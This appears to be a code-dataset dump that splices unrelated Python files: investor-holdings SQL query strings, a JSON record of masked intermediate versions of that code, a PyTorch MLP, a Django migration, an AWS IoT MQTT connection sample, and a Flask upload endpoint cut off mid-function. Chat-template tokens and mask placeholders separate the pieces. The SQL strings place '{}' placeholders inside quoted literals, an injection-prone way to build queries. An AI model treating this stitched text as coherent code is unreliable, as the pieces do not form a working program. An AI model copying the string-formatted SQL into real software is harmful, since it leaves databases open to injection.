"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date FROM (SELECT report_date, investor_holdings.investor_name AS investor,investor_id,AVG(investor_holdings.amount_held) AS invest_amount,AVG(investor_holdings.latest_change) AS invest_change,investor_holdings.security_id, MAX(isin) as isin,MAX(issue_date) as issue_date, MAX(maturity_date) as maturity_date FROM investor_holdings INNER JOIN securities ON investor_holdings.security_id = securities.id INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id INNER JOIN organizations ON issuing_entities.organization_id = organizations.id INNER JOIN gics ON organizations.sector = gics.sub_industry_id INNER JOIN security_issues ON security_issues.security_id = securities.id WHERE investor_holdings.deleted_at is NULL AND investor_holdings.report_date > '{}' AND issuing_entities.name = '{}' AND securities.currency = '{}' AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, investor_holdings.investor_id, investor_holdings.security_id, investor_holdings.report_date)) as FOO "
)
non_traditional_investor_stage1 = (
"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date FROM (SELECT report_date, investor_holdings.investor_name AS investor,investor_id,AVG(investor_holdings.amount_held) AS invest_amount,AVG(investor_holdings.latest_change) AS invest_change,investor_holdings.security_id, MAX(isin) as isin,MAX(issue_date) as issue_date, MAX(maturity_date) as maturity_date FROM investor_holdings INNER JOIN securities ON investor_holdings.security_id = securities.id INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id INNER JOIN organizations ON issuing_entities.organization_id = organizations.id INNER JOIN gics ON organizations.sector = gics.sub_industry_id INNER JOIN security_issues ON security_issues.security_id = securities.id WHERE investor_holdings.deleted_at is NULL AND investor_holdings.report_date > '{}' AND securities.currency = '{}' AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, investor_holdings.investor_id, investor_holdings.security_id, investor_holdings.report_date)) as FOO "
)
<|reserved_special_token_1|>
traditional_investor_stage1 = \
"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date "\
"FROM "\
"(SELECT "\
"report_date, "\
"investor_holdings.investor_name AS investor,"\
"investor_id,"\
"AVG(investor_holdings.amount_held) AS invest_amount,"\
"AVG(investor_holdings.latest_change) AS invest_change,"\
"investor_holdings.security_id, "\
"MAX(isin) as isin,"\
"MAX(issue_date) as issue_date, "\
"MAX(maturity_date) as maturity_date "\
"FROM investor_holdings "\
"INNER JOIN securities ON investor_holdings.security_id = securities.id "\
"INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id "\
"INNER JOIN organizations ON issuing_entities.organization_id = organizations.id "\
"INNER JOIN gics ON organizations.sector = gics.sub_industry_id "\
"INNER JOIN security_issues ON security_issues.security_id = securities.id "\
"WHERE investor_holdings.deleted_at is NULL "\
"AND investor_holdings.report_date > '{}' "\
"AND issuing_entities.name = '{}' "\
"AND securities.currency = '{}' "\
"AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, " \
"investor_holdings.investor_id, " \
"investor_holdings.security_id, " \
"investor_holdings.report_date)) as FOO "
non_traditional_investor_stage1 = \
"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date "\
"FROM "\
"(SELECT "\
"report_date, "\
"investor_holdings.investor_name AS investor,"\
"investor_id,"\
"AVG(investor_holdings.amount_held) AS invest_amount,"\
"AVG(investor_holdings.latest_change) AS invest_change,"\
"investor_holdings.security_id, "\
"MAX(isin) as isin,"\
"MAX(issue_date) as issue_date, "\
"MAX(maturity_date) as maturity_date "\
"FROM investor_holdings "\
"INNER JOIN securities ON investor_holdings.security_id = securities.id "\
"INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id "\
"INNER JOIN organizations ON issuing_entities.organization_id = organizations.id "\
"INNER JOIN gics ON organizations.sector = gics.sub_industry_id "\
"INNER JOIN security_issues ON security_issues.security_id = securities.id "\
"WHERE investor_holdings.deleted_at is NULL "\
"AND investor_holdings.report_date > '{}' "\
"AND securities.currency = '{}' "\
"AND gics.industry_group = '{}' GROUP BY "\
"(investor_holdings.investor_name, " \
"investor_holdings.investor_id, " \
"investor_holdings.security_id, " \
"investor_holdings.report_date)) as FOO "
|
flexible
|
{
"blob_id": "1e168cf6ba785a08244f47eb490b54605a09e4b0",
"index": 9433,
"step-1": "<mask token>\n",
"step-2": "traditional_investor_stage1 = (\n \"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date FROM (SELECT report_date, investor_holdings.investor_name AS investor,investor_id,AVG(investor_holdings.amount_held) AS invest_amount,AVG(investor_holdings.latest_change) AS invest_change,investor_holdings.security_id, MAX(isin) as isin,MAX(issue_date) as issue_date, MAX(maturity_date) as maturity_date FROM investor_holdings INNER JOIN securities ON investor_holdings.security_id = securities.id INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id INNER JOIN organizations ON issuing_entities.organization_id = organizations.id INNER JOIN gics ON organizations.sector = gics.sub_industry_id INNER JOIN security_issues ON security_issues.security_id = securities.id WHERE investor_holdings.deleted_at is NULL AND investor_holdings.report_date > '{}' AND issuing_entities.name = '{}' AND securities.currency = '{}' AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, investor_holdings.investor_id, investor_holdings.security_id, investor_holdings.report_date)) as FOO \"\n )\nnon_traditional_investor_stage1 = (\n \"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date FROM (SELECT report_date, investor_holdings.investor_name AS investor,investor_id,AVG(investor_holdings.amount_held) AS invest_amount,AVG(investor_holdings.latest_change) AS invest_change,investor_holdings.security_id, MAX(isin) as isin,MAX(issue_date) as issue_date, MAX(maturity_date) as maturity_date FROM investor_holdings INNER JOIN securities ON investor_holdings.security_id = securities.id INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id INNER JOIN organizations ON issuing_entities.organization_id = organizations.id INNER JOIN gics ON organizations.sector = gics.sub_industry_id INNER JOIN security_issues ON security_issues.security_id = securities.id WHERE investor_holdings.deleted_at is NULL AND investor_holdings.report_date > '{}' AND securities.currency = '{}' AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, investor_holdings.investor_id, investor_holdings.security_id, investor_holdings.report_date)) as FOO \"\n )\n",
"step-3": "\n\ntraditional_investor_stage1 = \\\n \"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date \"\\\n \"FROM \"\\\n \"(SELECT \"\\\n \"report_date, \"\\\n \"investor_holdings.investor_name AS investor,\"\\\n \"investor_id,\"\\\n \"AVG(investor_holdings.amount_held) AS invest_amount,\"\\\n \"AVG(investor_holdings.latest_change) AS invest_change,\"\\\n \"investor_holdings.security_id, \"\\\n \"MAX(isin) as isin,\"\\\n \"MAX(issue_date) as issue_date, \"\\\n \"MAX(maturity_date) as maturity_date \"\\\n \"FROM investor_holdings \"\\\n \"INNER JOIN securities ON investor_holdings.security_id = securities.id \"\\\n \"INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id \"\\\n \"INNER JOIN organizations ON issuing_entities.organization_id = organizations.id \"\\\n \"INNER JOIN gics ON organizations.sector = gics.sub_industry_id \"\\\n \"INNER JOIN security_issues ON security_issues.security_id = securities.id \"\\\n \"WHERE investor_holdings.deleted_at is NULL \"\\\n \"AND investor_holdings.report_date > '{}' \"\\\n \"AND issuing_entities.name = '{}' \"\\\n \"AND securities.currency = '{}' \"\\\n \"AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, \" \\\n \"investor_holdings.investor_id, \" \\\n \"investor_holdings.security_id, \" \\\n \"investor_holdings.report_date)) as FOO \"\n\n\nnon_traditional_investor_stage1 = \\\n \"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date \"\\\n \"FROM \"\\\n \"(SELECT \"\\\n \"report_date, \"\\\n \"investor_holdings.investor_name AS investor,\"\\\n \"investor_id,\"\\\n \"AVG(investor_holdings.amount_held) AS invest_amount,\"\\\n \"AVG(investor_holdings.latest_change) AS invest_change,\"\\\n \"investor_holdings.security_id, \"\\\n \"MAX(isin) as isin,\"\\\n \"MAX(issue_date) as issue_date, \"\\\n \"MAX(maturity_date) as maturity_date \"\\\n \"FROM investor_holdings \"\\\n \"INNER JOIN securities ON investor_holdings.security_id = securities.id \"\\\n \"INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id \"\\\n \"INNER JOIN organizations ON issuing_entities.organization_id = organizations.id \"\\\n \"INNER JOIN gics ON organizations.sector = gics.sub_industry_id \"\\\n \"INNER JOIN security_issues ON security_issues.security_id = securities.id \"\\\n \"WHERE investor_holdings.deleted_at is NULL \"\\\n \"AND investor_holdings.report_date > '{}' \"\\\n \"AND securities.currency = '{}' \"\\\n \"AND gics.industry_group = '{}' GROUP BY \"\\\n \"(investor_holdings.investor_name, \" \\\n \"investor_holdings.investor_id, \" \\\n \"investor_holdings.security_id, \" \\\n \"investor_holdings.report_date)) as FOO \"",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import torch
import torch.nn as nn
class MLPNet(nn.Module):
def __init__(self, num_classes):
super(MLPNet, self).__init__()
self.fc1 = nn.Linear(32 * 32 * 3, 512)
self.fc2 = nn.Linear(512, num_classes)
def forward(self, x):
x = x.view(x.size(0), -1)
x = self.fc1(x)
x = torch.sigmoid(x)
x = self.fc2(x)
return x
def zero_weights(self):
self.fc1.weight.data.fill_(0.0)
self.fc1.bias.data.fill_(0.0)
self.fc2.weight.data.fill_(0.0)
self.fc2.bias.data.fill_(0.0)
|
normal
|
{
"blob_id": "eff8b6a282ac73a116587e7ed04f386927c9f826",
"index": 9089,
"step-1": "<mask token>\n\n\nclass MLPNet(nn.Module):\n <mask token>\n\n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = torch.sigmoid(x)\n x = self.fc2(x)\n return x\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MLPNet(nn.Module):\n\n def __init__(self, num_classes):\n super(MLPNet, self).__init__()\n self.fc1 = nn.Linear(32 * 32 * 3, 512)\n self.fc2 = nn.Linear(512, num_classes)\n\n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = torch.sigmoid(x)\n x = self.fc2(x)\n return x\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass MLPNet(nn.Module):\n\n def __init__(self, num_classes):\n super(MLPNet, self).__init__()\n self.fc1 = nn.Linear(32 * 32 * 3, 512)\n self.fc2 = nn.Linear(512, num_classes)\n\n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = torch.sigmoid(x)\n x = self.fc2(x)\n return x\n\n def zero_weights(self):\n self.fc1.weight.data.fill_(0.0)\n self.fc1.bias.data.fill_(0.0)\n self.fc2.weight.data.fill_(0.0)\n self.fc2.bias.data.fill_(0.0)\n",
"step-4": "import torch\nimport torch.nn as nn\n\n\nclass MLPNet(nn.Module):\n\n def __init__(self, num_classes):\n super(MLPNet, self).__init__()\n self.fc1 = nn.Linear(32 * 32 * 3, 512)\n self.fc2 = nn.Linear(512, num_classes)\n\n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = torch.sigmoid(x)\n x = self.fc2(x)\n return x\n\n def zero_weights(self):\n self.fc1.weight.data.fill_(0.0)\n self.fc1.bias.data.fill_(0.0)\n self.fc2.weight.data.fill_(0.0)\n self.fc2.bias.data.fill_(0.0)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
# Generated by Django 2.1.4 on 2019-01-11 11:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('devisa', '0021_auto_20190110_1256'),
]
operations = [
migrations.RemoveField(
model_name='entidade',
name='bairro',
),
migrations.RemoveField(
model_name='entidade',
name='ent_cep',
),
migrations.RemoveField(
model_name='entidade',
name='ent_cnes',
),
migrations.RemoveField(
model_name='entidade',
name='ent_complemento',
),
migrations.RemoveField(
model_name='entidade',
name='ent_dt_expedicao',
),
migrations.RemoveField(
model_name='entidade',
name='ent_dt_inicio_func',
),
migrations.RemoveField(
model_name='entidade',
name='ent_email',
),
migrations.RemoveField(
model_name='entidade',
name='ent_endereco',
),
migrations.RemoveField(
model_name='entidade',
name='ent_especializacao',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fantasia',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fax',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fone',
),
migrations.RemoveField(
model_name='entidade',
name='ent_insc_estadual',
),
migrations.RemoveField(
model_name='entidade',
name='ent_insc_municipal',
),
migrations.RemoveField(
model_name='entidade',
name='ent_numero',
),
migrations.RemoveField(
model_name='entidade',
name='ent_obj_contrato_social',
),
migrations.RemoveField(
model_name='entidade',
name='ent_observacoes',
),
migrations.RemoveField(
model_name='entidade',
name='ent_orgao_exp',
),
migrations.RemoveField(
model_name='entidade',
name='ent_pasta_num',
),
migrations.RemoveField(
model_name='entidade',
name='ent_registro_conselho',
),
migrations.RemoveField(
model_name='entidade',
name='ent_rg',
),
migrations.RemoveField(
model_name='entidade',
name='escolaridade',
),
migrations.RemoveField(
model_name='entidade',
name='formacao_profissional',
),
migrations.RemoveField(
model_name='entidade',
name='municipio',
),
migrations.RemoveField(
model_name='entidade',
name='natureza_juridica_dependencia',
),
]
|
normal
|
{
"blob_id": "34f79fa3de68b53f19220697815e5bae5270d056",
"index": 9274,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('devisa', '0021_auto_20190110_1256')]\n operations = [migrations.RemoveField(model_name='entidade', name=\n 'bairro'), migrations.RemoveField(model_name='entidade', name=\n 'ent_cep'), migrations.RemoveField(model_name='entidade', name=\n 'ent_cnes'), migrations.RemoveField(model_name='entidade', name=\n 'ent_complemento'), migrations.RemoveField(model_name='entidade',\n name='ent_dt_expedicao'), migrations.RemoveField(model_name=\n 'entidade', name='ent_dt_inicio_func'), migrations.RemoveField(\n model_name='entidade', name='ent_email'), migrations.RemoveField(\n model_name='entidade', name='ent_endereco'), migrations.RemoveField\n (model_name='entidade', name='ent_especializacao'), migrations.\n RemoveField(model_name='entidade', name='ent_fantasia'), migrations\n .RemoveField(model_name='entidade', name='ent_fax'), migrations.\n RemoveField(model_name='entidade', name='ent_fone'), migrations.\n RemoveField(model_name='entidade', name='ent_insc_estadual'),\n migrations.RemoveField(model_name='entidade', name=\n 'ent_insc_municipal'), migrations.RemoveField(model_name='entidade',\n name='ent_numero'), migrations.RemoveField(model_name='entidade',\n name='ent_obj_contrato_social'), migrations.RemoveField(model_name=\n 'entidade', name='ent_observacoes'), migrations.RemoveField(\n model_name='entidade', name='ent_orgao_exp'), migrations.\n RemoveField(model_name='entidade', name='ent_pasta_num'),\n migrations.RemoveField(model_name='entidade', name=\n 'ent_registro_conselho'), migrations.RemoveField(model_name=\n 'entidade', name='ent_rg'), migrations.RemoveField(model_name=\n 'entidade', name='escolaridade'), migrations.RemoveField(model_name\n ='entidade', name='formacao_profissional'), migrations.RemoveField(\n model_name='entidade', name='municipio'), migrations.RemoveField(\n model_name='entidade', name='natureza_juridica_dependencia')]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('devisa', '0021_auto_20190110_1256')]\n operations = [migrations.RemoveField(model_name='entidade', name=\n 'bairro'), migrations.RemoveField(model_name='entidade', name=\n 'ent_cep'), migrations.RemoveField(model_name='entidade', name=\n 'ent_cnes'), migrations.RemoveField(model_name='entidade', name=\n 'ent_complemento'), migrations.RemoveField(model_name='entidade',\n name='ent_dt_expedicao'), migrations.RemoveField(model_name=\n 'entidade', name='ent_dt_inicio_func'), migrations.RemoveField(\n model_name='entidade', name='ent_email'), migrations.RemoveField(\n model_name='entidade', name='ent_endereco'), migrations.RemoveField\n (model_name='entidade', name='ent_especializacao'), migrations.\n RemoveField(model_name='entidade', name='ent_fantasia'), migrations\n .RemoveField(model_name='entidade', name='ent_fax'), migrations.\n RemoveField(model_name='entidade', name='ent_fone'), migrations.\n RemoveField(model_name='entidade', name='ent_insc_estadual'),\n migrations.RemoveField(model_name='entidade', name=\n 'ent_insc_municipal'), migrations.RemoveField(model_name='entidade',\n name='ent_numero'), migrations.RemoveField(model_name='entidade',\n name='ent_obj_contrato_social'), migrations.RemoveField(model_name=\n 'entidade', name='ent_observacoes'), migrations.RemoveField(\n model_name='entidade', name='ent_orgao_exp'), migrations.\n RemoveField(model_name='entidade', name='ent_pasta_num'),\n migrations.RemoveField(model_name='entidade', name=\n 'ent_registro_conselho'), migrations.RemoveField(model_name=\n 'entidade', name='ent_rg'), migrations.RemoveField(model_name=\n 'entidade', name='escolaridade'), migrations.RemoveField(model_name\n ='entidade', name='formacao_profissional'), migrations.RemoveField(\n model_name='entidade', name='municipio'), migrations.RemoveField(\n model_name='entidade', name='natureza_juridica_dependencia')]\n",
"step-5": "# Generated by Django 2.1.4 on 2019-01-11 11:58\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('devisa', '0021_auto_20190110_1256'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='entidade',\n name='bairro',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_cep',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_cnes',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_complemento',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_dt_expedicao',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_dt_inicio_func',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_email',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_endereco',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_especializacao',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_fantasia',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_fax',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_fone',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_insc_estadual',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_insc_municipal',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_numero',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_obj_contrato_social',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_observacoes',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_orgao_exp',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_pasta_num',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_registro_conselho',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_rg',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='escolaridade',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='formacao_profissional',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='municipio',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='natureza_juridica_dependencia',\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
from awscrt import http, io
from awsiot import mqtt_connection_builder
from utils.command_line_utils import CommandLineUtils
# This sample shows how to create a MQTT connection using a certificate file and key file.
# This sample is intended to be used as a reference for making MQTT connections.
# Callback when connection is accidentally lost.
def on_connection_interrupted(connection, error, **kwargs):
print("Connection interrupted. error: {}".format(error))
# Callback when an interrupted connection is re-established.
def on_connection_resumed(connection, return_code, session_present, **kwargs):
print("Connection resumed. return_code: {} session_present: {}".format(return_code, session_present))
if __name__ == '__main__':
io.init_logging(log_level=io.LogLevel.Trace, file_name="stderr")
# cmdData is the arguments/input from the command line placed into a single struct for
# use in this sample. This handles all of the command line parsing, validating, etc.
# See the Utils/CommandLineUtils for more information.
cmdData = CommandLineUtils.parse_sample_input_pkcs12_connect()
# Create the proxy options if the data is present in cmdData
proxy_options = None
if cmdData.input_proxy_host is not None and cmdData.input_proxy_port != 0:
proxy_options = http.HttpProxyOptions(
host_name=cmdData.input_proxy_host,
port=cmdData.input_proxy_port)
# Create a MQTT connection from the command line data
mqtt_connection = mqtt_connection_builder.mtls_with_pkcs12(
endpoint=cmdData.input_endpoint,
port=cmdData.input_port,
pkcs12_filepath=cmdData.input_pkcs12_file,
pkcs12_password=cmdData.input_pkcs12_password,
on_connection_interrupted=on_connection_interrupted,
on_connection_resumed=on_connection_resumed,
client_id=cmdData.input_clientId,
clean_session=False,
keep_alive_secs=30,
http_proxy_options=proxy_options)
if not cmdData.input_is_ci:
print(f"Connecting to {cmdData.input_endpoint} with client ID '{cmdData.input_clientId}'...")
else:
print("Connecting to endpoint with client ID")
connect_future = mqtt_connection.connect()
# Future.result() waits until a result is available
connect_future.result()
print("Connected!")
# Disconnect
print("Disconnecting...")
disconnect_future = mqtt_connection.disconnect()
disconnect_future.result()
print("Disconnected!")
|
normal
|
{
"blob_id": "2ff398e38b49d95fdc8a36a08eeb5950aaea1bc9",
"index": 2279,
"step-1": "<mask token>\n\n\ndef on_connection_resumed(connection, return_code, session_present, **kwargs):\n print('Connection resumed. return_code: {} session_present: {}'.format(\n return_code, session_present))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef on_connection_interrupted(connection, error, **kwargs):\n print('Connection interrupted. error: {}'.format(error))\n\n\ndef on_connection_resumed(connection, return_code, session_present, **kwargs):\n print('Connection resumed. return_code: {} session_present: {}'.format(\n return_code, session_present))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef on_connection_interrupted(connection, error, **kwargs):\n print('Connection interrupted. error: {}'.format(error))\n\n\ndef on_connection_resumed(connection, return_code, session_present, **kwargs):\n print('Connection resumed. return_code: {} session_present: {}'.format(\n return_code, session_present))\n\n\nif __name__ == '__main__':\n io.init_logging(log_level=io.LogLevel.Trace, file_name='stderr')\n cmdData = CommandLineUtils.parse_sample_input_pkcs12_connect()\n proxy_options = None\n if cmdData.input_proxy_host is not None and cmdData.input_proxy_port != 0:\n proxy_options = http.HttpProxyOptions(host_name=cmdData.\n input_proxy_host, port=cmdData.input_proxy_port)\n mqtt_connection = mqtt_connection_builder.mtls_with_pkcs12(endpoint=\n cmdData.input_endpoint, port=cmdData.input_port, pkcs12_filepath=\n cmdData.input_pkcs12_file, pkcs12_password=cmdData.\n input_pkcs12_password, on_connection_interrupted=\n on_connection_interrupted, on_connection_resumed=\n on_connection_resumed, client_id=cmdData.input_clientId,\n clean_session=False, keep_alive_secs=30, http_proxy_options=\n proxy_options)\n if not cmdData.input_is_ci:\n print(\n f\"Connecting to {cmdData.input_endpoint} with client ID '{cmdData.input_clientId}'...\"\n )\n else:\n print('Connecting to endpoint with client ID')\n connect_future = mqtt_connection.connect()\n connect_future.result()\n print('Connected!')\n print('Disconnecting...')\n disconnect_future = mqtt_connection.disconnect()\n disconnect_future.result()\n print('Disconnected!')\n",
"step-4": "from awscrt import http, io\nfrom awsiot import mqtt_connection_builder\nfrom utils.command_line_utils import CommandLineUtils\n\n\ndef on_connection_interrupted(connection, error, **kwargs):\n print('Connection interrupted. error: {}'.format(error))\n\n\ndef on_connection_resumed(connection, return_code, session_present, **kwargs):\n print('Connection resumed. return_code: {} session_present: {}'.format(\n return_code, session_present))\n\n\nif __name__ == '__main__':\n io.init_logging(log_level=io.LogLevel.Trace, file_name='stderr')\n cmdData = CommandLineUtils.parse_sample_input_pkcs12_connect()\n proxy_options = None\n if cmdData.input_proxy_host is not None and cmdData.input_proxy_port != 0:\n proxy_options = http.HttpProxyOptions(host_name=cmdData.\n input_proxy_host, port=cmdData.input_proxy_port)\n mqtt_connection = mqtt_connection_builder.mtls_with_pkcs12(endpoint=\n cmdData.input_endpoint, port=cmdData.input_port, pkcs12_filepath=\n cmdData.input_pkcs12_file, pkcs12_password=cmdData.\n input_pkcs12_password, on_connection_interrupted=\n on_connection_interrupted, on_connection_resumed=\n on_connection_resumed, client_id=cmdData.input_clientId,\n clean_session=False, keep_alive_secs=30, http_proxy_options=\n proxy_options)\n if not cmdData.input_is_ci:\n print(\n f\"Connecting to {cmdData.input_endpoint} with client ID '{cmdData.input_clientId}'...\"\n )\n else:\n print('Connecting to endpoint with client ID')\n connect_future = mqtt_connection.connect()\n connect_future.result()\n print('Connected!')\n print('Disconnecting...')\n disconnect_future = mqtt_connection.disconnect()\n disconnect_future.result()\n print('Disconnected!')\n",
"step-5": "# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0.\n\nfrom awscrt import http, io\nfrom awsiot import mqtt_connection_builder\nfrom utils.command_line_utils import CommandLineUtils\n\n# This sample shows how to create a MQTT connection using a certificate file and key file.\n# This sample is intended to be used as a reference for making MQTT connections.\n\n# Callback when connection is accidentally lost.\ndef on_connection_interrupted(connection, error, **kwargs):\n print(\"Connection interrupted. error: {}\".format(error))\n\n# Callback when an interrupted connection is re-established.\ndef on_connection_resumed(connection, return_code, session_present, **kwargs):\n print(\"Connection resumed. return_code: {} session_present: {}\".format(return_code, session_present))\n\n\nif __name__ == '__main__':\n\n io.init_logging(log_level=io.LogLevel.Trace, file_name=\"stderr\")\n\n # cmdData is the arguments/input from the command line placed into a single struct for\n # use in this sample. This handles all of the command line parsing, validating, etc.\n # See the Utils/CommandLineUtils for more information.\n cmdData = CommandLineUtils.parse_sample_input_pkcs12_connect()\n\n # Create the proxy options if the data is present in cmdData\n proxy_options = None\n if cmdData.input_proxy_host is not None and cmdData.input_proxy_port != 0:\n proxy_options = http.HttpProxyOptions(\n host_name=cmdData.input_proxy_host,\n port=cmdData.input_proxy_port)\n\n # Create a MQTT connection from the command line data\n mqtt_connection = mqtt_connection_builder.mtls_with_pkcs12(\n endpoint=cmdData.input_endpoint,\n port=cmdData.input_port,\n pkcs12_filepath=cmdData.input_pkcs12_file,\n pkcs12_password=cmdData.input_pkcs12_password,\n on_connection_interrupted=on_connection_interrupted,\n on_connection_resumed=on_connection_resumed,\n client_id=cmdData.input_clientId,\n clean_session=False,\n keep_alive_secs=30,\n http_proxy_options=proxy_options)\n\n if not cmdData.input_is_ci:\n print(f\"Connecting to {cmdData.input_endpoint} with client ID '{cmdData.input_clientId}'...\")\n else:\n print(\"Connecting to endpoint with client ID\")\n\n connect_future = mqtt_connection.connect()\n # Future.result() waits until a result is available\n connect_future.result()\n print(\"Connected!\")\n\n # Disconnect\n print(\"Disconnecting...\")\n disconnect_future = mqtt_connection.disconnect()\n disconnect_future.result()\n print(\"Disconnected!\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@app.route('/')
def hello():
return 'Hello word'
@app.route('/analyze', methods=['POST'])
def analyze():
if request.method == 'POST':
image_file = request.files['image']
file_name = secure_filename(image_file.filename)
image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))
print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[
'UPLOAD_FOLDER']))
binarization = Binarizacion(f'./public/files/{file_name}')
binarization.binaryImage()
binarization.otsuImage()
binarization.adatativeImage()
binarization.fondoMorfologico()
m, color, diametro, pre = binarization.analize()
return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',
'm': m, 'color': color, 'diametro': diametro, 'pre': pre})
return json.dumps({'ok': False})
<|reserved_special_token_1|>
<|reserved_special_token_0|>
CORS(app)
@app.route('/')
def hello():
return 'Hello word'
@app.route('/analyze', methods=['POST'])
def analyze():
if request.method == 'POST':
image_file = request.files['image']
file_name = secure_filename(image_file.filename)
image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))
print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[
'UPLOAD_FOLDER']))
binarization = Binarizacion(f'./public/files/{file_name}')
binarization.binaryImage()
binarization.otsuImage()
binarization.adatativeImage()
binarization.fondoMorfologico()
m, color, diametro, pre = binarization.analize()
return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',
'm': m, 'color': color, 'diametro': diametro, 'pre': pre})
return json.dumps({'ok': False})
<|reserved_special_token_1|>
<|reserved_special_token_0|>
UPLOAD_FOLDER = './public/files'
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
CORS(app)
@app.route('/')
def hello():
return 'Hello word'
@app.route('/analyze', methods=['POST'])
def analyze():
if request.method == 'POST':
image_file = request.files['image']
file_name = secure_filename(image_file.filename)
image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))
print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[
'UPLOAD_FOLDER']))
binarization = Binarizacion(f'./public/files/{file_name}')
binarization.binaryImage()
binarization.otsuImage()
binarization.adatativeImage()
binarization.fondoMorfologico()
m, color, diametro, pre = binarization.analize()
return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',
'm': m, 'color': color, 'diametro': diametro, 'pre': pre})
return json.dumps({'ok': False})
<|reserved_special_token_1|>
import json
import os
from flask import Flask, request, url_for
from flask_cors import CORS
from werkzeug.utils import secure_filename
from service.Binarizacion import Binarizacion
UPLOAD_FOLDER = './public/files'
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
CORS(app)
@app.route('/')
def hello():
return 'Hello word'
@app.route('/analyze', methods=['POST'])
def analyze():
if request.method == 'POST':
image_file = request.files['image']
file_name = secure_filename(image_file.filename)
image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))
